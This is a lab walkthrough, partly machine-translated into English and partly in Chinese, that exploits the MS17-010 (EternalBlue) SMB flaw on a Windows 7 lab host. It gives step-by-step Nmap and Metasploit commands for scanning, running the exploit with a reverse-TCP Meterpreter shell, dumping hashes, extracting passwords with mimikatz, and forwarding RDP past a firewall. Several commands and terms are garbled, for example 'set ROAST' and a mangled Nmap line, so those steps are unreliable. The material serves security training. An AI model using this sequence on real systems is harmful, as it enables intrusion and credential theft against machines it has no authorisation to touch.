lab environment
-
Manipulator:
Kali 2017
-
Manipulator IP:
172.16.11.2
-
Target:
Windows 7
-
Target IP:
172.16.12.2
Purpose
-
Hazard recognition and Windows Remote Overflow Vulnerability
-
Aware of the discovery and validation process MS17-010 Vulnerability
-
Learn to use advanced tools Metasploit
Experimental tool
Nmap
: Port scan detection tool for detecting open ports situation, this time using its port scanning and vulnerability scanning capabilities
mestasploit
: Open-source penetration testing framework software, integrated exploits, this experiment using their exploits module, meterpreter components
Content Experiments
Vulnerability principles outlined
MS17-010 vulnerability in Windows SMB v1 appear in the kernel mode function srv!SrvOs2FeaListToNt
in processing FEA
time (File Extended Attributes) conversion, there is a buffer overflow on the large non-paged pool (Large Non-Paged Kernel Pool) .
Function srv!SrvOs2FeaListToNt
in the FEA
list is converted to NTFEA
(Windows NT FEA) will be called before the list srv!SrvOs2FeaListSizeToNt
size FEA lsit after conversion to calculate, because of the size of the calculation error, which led to a buffer overflow.
Experimental Procedure
When the NSA had leaked toolbox, we have done to explain the use of this tool eternal blue! [NSA] Windows 0day hacker toolkit validation experiments .
However, the use of the tool relatively harsh environment, and the operation is more complex, msf has now joined the family of tools, use more convenient. Then, they begin to operate it!
Step 1 port probes
Kali open end, the use of target Nmap scanning open port
Pn sV Nmap is effective enough 17216 . 12.2
Open the target machine 135
139
445
3389
and other ports, and the target system is Windows7,
Step 2 Vulnerability Scanning
We use the scanning module to determine whether the vulnerability can be used
Remember nmap scan script ms08-067 do? MSF has a scanning module ~
The input terminal
msfconsole
Open the metasploite
command line client, use the search
command to find ms17-010 vulnerabilities related modules
search ms17-010
Related module is available as
Use use
command to select the scanning module we want to use
use auxiliary/scanner/smb/smb_ms17_010
Before you run the module, you need to set the relevant options that we use show options
to check the configuration
Need to set the target address, set the command:
set RHOSTS 172.16.12.2
After setup, execution run
or exploit
command, wait for the results
Step 3: Exploit
As can be seen from the previous step, is the vulnerability can be utilized, Next, we resorted to exploit module
use exploit/windows/smb/ms17_010_eternalblue
Steps above, check the configuration and set the mark as the property yes
show options
Target host address: 172.16.12.2
set ROAST 172.16 . 12.2
Note here RHOST, and when the scan is not the same RHOSTS
Then, select the load payload
, that is shellcode
, here we choose to connect back to the control terminal shell
ofpayload
set payload windows/x64/meterpreter/reverse_tcp
Similarly, the load also needs to be configured, show options
view the configuration information
The lack of local host configuration RHOST, set about
set LHOST 172.16.11.2
本地端口LPORT默认为4444,可通过
set LPORT 端口号
修改
完成配置后,运行exploit
或者run
,开始执行漏洞利用模块
成功获取来自目标主机的Session会话
第4步:远程登录目标机
我们已经成功的获取Session会话了,本次我们继续介绍meterpreter后渗透模块的其他功能
运行sysinfo
查看目标机器相关信息
执行help
命令可以帮助我们了解meterpreter有哪些功能
接下来,我们获取目标机hash值
执行hashdump
mimikatz
是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等,meterpreter
中正集成了这款工具。
执行load mimikatz
即可加载该工具,其命令与mimikatz
一样
运行命令msv
,导出hash
然后执行kerberos
即可获得目标机账号密码
获取了目标机的账号密码,我们结合nmap的扫描结果,可以远程登陆目标机 但是现实中,防火墙一般会拦截外来3389端口的访问请求,这种情况下该怎么解决呢?
我们可以使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接
运行命令
portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.12.2
Here, we will target remote port 3389, and forwarded to the 3389 machine 172.16.11.2
The local port number can be set to a different port is not listening
So, we just run
rdesktop 127.0.0.1 -u ichunqiu -p ichunqiu
You can login remote target machine
Analysis of experimental results and summary
Through this experiment, we are familiar with from the discovery of vulnerabilities, to verify the vulnerability, and then to exploit this process, and to further study the use of other cases after the penetration of Metasploit module.